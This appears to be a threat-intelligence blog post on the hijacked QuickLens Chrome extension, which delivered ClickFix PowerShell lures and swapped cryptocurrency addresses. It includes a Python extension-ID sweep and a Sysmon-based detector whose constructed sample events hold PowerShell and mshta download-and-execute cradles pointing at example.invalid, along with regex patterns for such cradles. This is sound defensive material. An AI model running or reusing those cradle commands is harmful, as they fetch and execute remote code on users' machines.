root@rebel:~$ cd /news/threats/quicklens-chrome-extension-hijacked-to-deploy-clickfix-malware_
[TIMESTAMP: 2026-02-28 20:09 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: HIGH]

QuickLens Chrome Extension Hijacked to Deploy ClickFix Malware

AI-Assisted Analysis

Executive Summary

A widely used Chrome extension, “QuickLens - Search Screen with Google Lens,” was found pushing malicious code to its users and has been removed from the Chrome Web Store. According to BleepingComputer, the compromised extension was used to serve phishing pages and steal cryptocurrency from an install base of more than 30,000 users. Delivery relied on the social-engineering technique known as “ClickFix,” in which users are tricked into running attacker-supplied PowerShell commands under the pretext of fixing a browser error.

Technical Analysis

The QuickLens incident is part of a growing trend of supply-chain attacks through browser extensions. Threat actors buy legitimate extensions with an established user base, or compromise the developer's account, and then push a malicious update. In this instance, an update to the extension (ID: pbdpajmclcmfodbaidmhpbmglfndabnd) added scripts for both data theft and malware delivery. Because Chrome auto-updates installed extensions from the Web Store, a single compromised listing reaches the entire install base with no action from the victims.

The ClickFix Social Engineering Tactic

The primary delivery mechanism observed in this campaign is the ClickFix technique. When a user visits a compromised or attacker-controlled site, the extension injects scripts that draw a fake error overlay. The overlay mimics a system dialog or a browser error and claims that a component is missing. To “resolve” the issue, the user is told to copy a command and run it themselves; in the ClickFix variants seen to date that usually means pasting it into the Windows Run dialog (Win+R) or a PowerShell window, and the lure supplies the exact keystrokes.

In MITRE ATT&CK terms the lure is User Execution: Malicious Copy and Paste (T1204.004), and the resulting execution is Command and Scripting Interpreter: PowerShell (T1059.001). The approach sidesteps the browser's own controls (the renderer sandbox, download scanning, the extension permission model) because the browser never executes anything: the user carries the code across the boundary by hand. The pasted command typically retrieves a second-stage payload from a C2 server, leading to the installation of info-stealers or ransomware.

Cryptocurrency Theft and Script Injection

Beyond the ClickFix lure, the malicious version of QuickLens watched the pages its users visited for interactions with cryptocurrency wallets and exchanges. The extension injected JavaScript into active tabs to look for wallet-address patterns, and when a user set up a transaction it rewrote the intended recipient's address to one controlled by the attackers. This address-swapping behaviour, a DOM-based variant of the clipboard “clipper” trick, is hard for non-technical users to spot: the substitution happens inside the page's Document Object Model (DOM) before the transaction is signed and broadcast, so the address the user checks on screen is already the attacker's.

Defensive Recommendations

Defenders and SOC teams should treat browser extensions as potential entry points for data exfiltration and initial access.

Detection and IoC Management

Organizations should audit their environments for the specific extension ID pbdpajmclcmfodbaidmhpbmglfndabnd. Removal from the Chrome Web Store does not uninstall an extension: unless Google remotely disables it as flagged malware, it stays installed and active on every endpoint that already had it until it is removed by hand or disabled by enterprise policy (the ExtensionInstallBlocklist policy disables an already-installed extension as well as preventing new installs). The IDs to check on disk are the per-profile Extensions\<id> directories and the extensions.settings entries in each profile's Preferences and Secure Preferences files.
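The sweep described above, as an added example for this article (it is not code from the article, from BleepingComputer or from the QuickLens project). It relies on real Chrome on-disk layout (unpacked extensions under <User Data>/<Profile>/Extensions/<id>/<version>_<n>/ and the extensions.settings map in the profile's Preferences / Secure Preferences JSON) and on the real ExtensionInstallBlocklist / ExtensionInstallAllowlist policy names. The sample profile, its version numbers and the 32-letter "aaaa…" approved ID are constructed placeholders so the script runs offline.

```python
"""Sweep Chrome profiles for a known-bad extension ID and build the policy that blocks it.

Added example for this article (not code from the article, BleepingComputer or
the QuickLens project). The sample profile below is constructed in a temp
directory; version numbers and the "aaaa..." approved ID are placeholders.
"""
import json
import os
import tempfile
from pathlib import Path

# The compromised extension ID from the article; add further IDs as they are published.
BAD_IDS = {
    "pbdpajmclcmfodbaidmhpbmglfndabnd": "QuickLens - Search Screen with Google Lens (compromised)",
}

# Placeholder for an approved extension ID (Chrome IDs are 32 letters a-p); not a real extension.
APPROVED_PLACEHOLDER = "a" * 32


def chrome_user_data_dirs():
    """Default Chrome 'User Data' roots for Windows, macOS and Linux that exist on this host."""
    home = Path.home()
    candidates = [
        Path(os.environ.get("LOCALAPPDATA", "")) / "Google" / "Chrome" / "User Data",
        home / "Library" / "Application Support" / "Google" / "Chrome",
        home / ".config" / "google-chrome",
    ]
    return [p for p in candidates if p.is_dir()]


def installed_extensions(user_data):
    """Yield (profile, extension_id, version, evidence) for every profile under user_data."""
    for profile in sorted(Path(user_data).iterdir()):
        if not profile.is_dir():
            continue
        # Evidence 1: the unpacked extension directories on disk.
        ext_root = profile / "Extensions"
        if ext_root.is_dir():
            for ext_dir in sorted(p for p in ext_root.iterdir() if p.is_dir()):
                for version_dir in sorted(p for p in ext_dir.iterdir() if p.is_dir()):
                    # Directory names look like "1.2.3_0"; keep the version part only.
                    yield profile.name, ext_dir.name, version_dir.name.split("_")[0], "Extensions dir"
        # Evidence 2: the extension registry inside the profile's preference files.
        for pref_name in ("Preferences", "Secure Preferences"):
            pref_file = profile / pref_name
            if not pref_file.is_file():
                continue
            try:
                data = json.loads(pref_file.read_text(encoding="utf-8"))
            except (OSError, ValueError):
                continue  # locked or half-written file: skip it rather than abort the sweep
            for ext_id, meta in data.get("extensions", {}).get("settings", {}).items():
                version = ((meta or {}).get("manifest") or {}).get("version", "unknown")
                yield profile.name, ext_id, version, pref_name


def find_bad_extensions(user_data, bad_ids=BAD_IDS):
    """Return one finding per (profile, extension ID) that matches bad_ids."""
    findings = {}
    for profile, ext_id, version, evidence in installed_extensions(user_data):
        if ext_id not in bad_ids:
            continue
        hit = findings.setdefault(
            (profile, ext_id),
            {"profile": profile, "id": ext_id, "name": bad_ids[ext_id], "versions": set(), "evidence": set()},
        )
        hit["versions"].add(version)
        hit["evidence"].add(evidence)
    return [dict(h, versions=sorted(h["versions"]), evidence=sorted(h["evidence"])) for h in findings.values()]


def blocklist_policy(bad_ids=BAD_IDS, allowlist=None):
    """Chrome policy values that disable bad_ids on every managed browser.

    Chrome disables an already-installed extension once its ID is blocklisted.
    With an allowlist, "*" is appended so everything not explicitly approved is
    blocked too (default-deny). Deploy under HKLM\\Software\\Policies\\Google\\Chrome
    on Windows or as JSON in /etc/opt/chrome/policies/managed/ on Linux.
    """
    policy = {"ExtensionInstallBlocklist": sorted(bad_ids)}
    if allowlist is not None:
        policy["ExtensionInstallBlocklist"].append("*")
        policy["ExtensionInstallAllowlist"] = sorted(allowlist)
    return policy


def build_sample_user_data():
    """Constructed sample profile (not real telemetry): QuickLens plus one approved extension."""
    root = Path(tempfile.mkdtemp(prefix="chrome-sample-"))
    profile = root / "Default"
    (profile / "Extensions" / "pbdpajmclcmfodbaidmhpbmglfndabnd" / "1.2.3_0").mkdir(parents=True)
    prefs = {"extensions": {"settings": {
        "pbdpajmclcmfodbaidmhpbmglfndabnd": {"manifest": {"name": "QuickLens", "version": "1.2.3"}, "state": 1},
        APPROVED_PLACEHOLDER: {"manifest": {"name": "Approved extension", "version": "4.0"}, "state": 1},
    }}}
    (profile / "Secure Preferences").write_text(json.dumps(prefs), encoding="utf-8")
    return root


if __name__ == "__main__":
    roots = chrome_user_data_dirs() or [build_sample_user_data()]
    for root in roots:
        for hit in find_bad_extensions(root):
            print(f"[!] {root} profile={hit['profile']} id={hit['id']} ({hit['name']}) "
                  f"versions={hit['versions']} evidence={hit['evidence']}")
    print(json.dumps(blocklist_policy(allowlist=[APPROVED_PLACEHOLDER]), indent=2))
```

Run it as-is and it sweeps the real Chrome profile roots on the host, falling back to the constructed sample when none exist; the printed policy is what to push through GPO or a managed-policy JSON file, and the disk plus preference-file evidence is worth keeping even after the policy lands, since it tells you which users ran the compromised version and should have their wallet transactions and credentials reviewed.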

Actionable Mitigations

  • Extension Allowlisting: Use Group Policy Objects (GPO) or an MDM solution to enforce a default-deny extension policy (ExtensionInstallBlocklist set to “*” with an ExtensionInstallAllowlist of approved IDs), so users cannot install unvetted third-party extensions and a blocklisted ID is disabled even where it is already installed.
  • PowerShell Controls and Telemetry: PowerShell's execution policy is not a security boundary; ClickFix commands are pasted inline and commonly carry -ExecutionPolicy Bypass or -EncodedCommand, so they run under a “restricted” policy anyway. Where feasible, constrain PowerShell for standard users with AppLocker or WDAC and Constrained Language Mode, and in any case turn on Script Block Logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104). Configure EDR to alert on script hosts spawned by a browser process, but note that the usual Win+R variant of ClickFix launches PowerShell from explorer.exe, not the browser: also alert on explorer.exe-parented PowerShell whose command line contains download-cradle markers (iwr/irm, iex, -enc, -w hidden, -nop), and review HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records what was typed into the Run dialog.
  • User Education: Train staff that no legitimate website, CAPTCHA, update prompt or error dialog will ever ask them to copy a command and paste it into the Run dialog or a terminal; an instruction to “press Win+R and paste” is the attack itself, and should be reported rather than followed.
  • Out-of-Band Address Verification: For high-value crypto-asset management, use hardware wallets and confirm the recipient address on the device's own screen. The address shown in the browser can be rewritten in the DOM by a malicious extension; the address displayed by the signing device cannot.
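The process-creation checks described in the PowerShell bullet above, and the execution step of the ClickFix technique itself, as an added example for this article (it is not code from the article or from any EDR product). Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the six events, the paths and the example.invalid host are constructed, not captured telemetry. Alongside the browser-parent rule the article suggests, it also covers the explorer.exe-parented launch that the Win+R flow produces and decodes -EncodedCommand payloads before matching them.

```python
"""Flag ClickFix-style command execution in process-creation telemetry.

Added example for this article; not code from the article or from an EDR
vendor. Field names follow Sysmon Event ID 1 and the sample events below are
constructed. Checks: (1) a script host spawned directly by a browser;
(2) a script host spawned by explorer.exe with download-cradle arguments,
which is what "press Win+R, paste, Enter" actually produces; (3) two or more
cradle markers on the command line regardless of parent.
"""
import base64
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# (description, pattern); case-insensitive because lures mix case and use aliases.
CRADLE_PATTERNS = [
    ("web download", re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b", re.I)),
    ("in-memory execution", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("encoded command", re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)),
    ("hidden window", re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.I)),
    ("profile/policy bypass", re.compile(r"(^|\s)-(nop|noprofile|ep|executionpolicy)\b", re.I)),
    ("mshta remote script", re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
]
ENCODED_RX = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE text) or return None."""
    m = ENCODED_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return {"alert": bool, "reasons": [...]} for one process-creation event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image not in SCRIPT_HOSTS:
        return {"alert": False, "reasons": []}

    cradle = [desc for desc, rx in CRADLE_PATTERNS if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded:  # the interesting content of an encoded launch is only visible after decoding
        cradle += [f"{desc} (decoded)" for desc, rx in CRADLE_PATTERNS if rx.search(decoded)]

    reasons = []
    if parent in BROWSERS:
        reasons.append(f"{image} spawned directly by browser {parent}")
    if parent == "explorer.exe" and cradle:
        reasons.append(f"{image} spawned by explorer.exe (Run dialog / shell) with cradle arguments")
    reasons += [f"command line: {desc}" for desc in cradle]

    alert = parent in BROWSERS or (parent == "explorer.exe" and bool(cradle)) or len(cradle) >= 2
    return {"alert": alert, "reasons": reasons}


def scan(events):
    """Evaluate every event, preserving order."""
    return [evaluate(e) for e in events]


def build_sample_events():
    """Constructed events; example.invalid is a reserved name that never resolves."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    explorer = r"C:\Windows\explorer.exe"
    encoded = base64.b64encode("iex (iwr https://example.invalid/p)".encode("utf-16-le")).decode()
    return [
        {"Image": ps, "ParentImage": explorer,
         "CommandLine": 'powershell -w hidden -nop -c "iex (irm https://example.invalid/verify)"'},
        {"Image": ps, "ParentImage": explorer,
         "CommandLine": f"powershell.exe -NoProfile -EncodedCommand {encoded}"},
        {"Image": ps, "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
         "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
        {"Image": ps, "ParentImage": r"C:\Windows\System32\svchost.exe",
         "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
        {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": explorer, "CommandLine": "notepad.exe"},
        {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": explorer,
         "CommandLine": "mshta https://example.invalid/fix.hta"},
    ]


if __name__ == "__main__":
    events = build_sample_events()
    for event, result in zip(events, scan(events)):
        flag = "ALERT" if result["alert"] else "ok   "
        print(f"{flag} {basename(event['ParentImage'])} -> {event['CommandLine'][:60]}")
        for reason in result["reasons"]:
            print(f"        - {reason}")
```

The scheduled-task launch (svchost.exe parent, -File with no cradle markers) and the notepad.exe event are included to show the rule staying quiet on ordinary activity; the mshta event shows why the script-host set must be wider than powershell.exe, since ClickFix lures rotate between PowerShell, cmd and mshta. In production, feed the same function from Sysmon or the EDR's process-start stream and pair alerts with a RunMRU review on the host.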
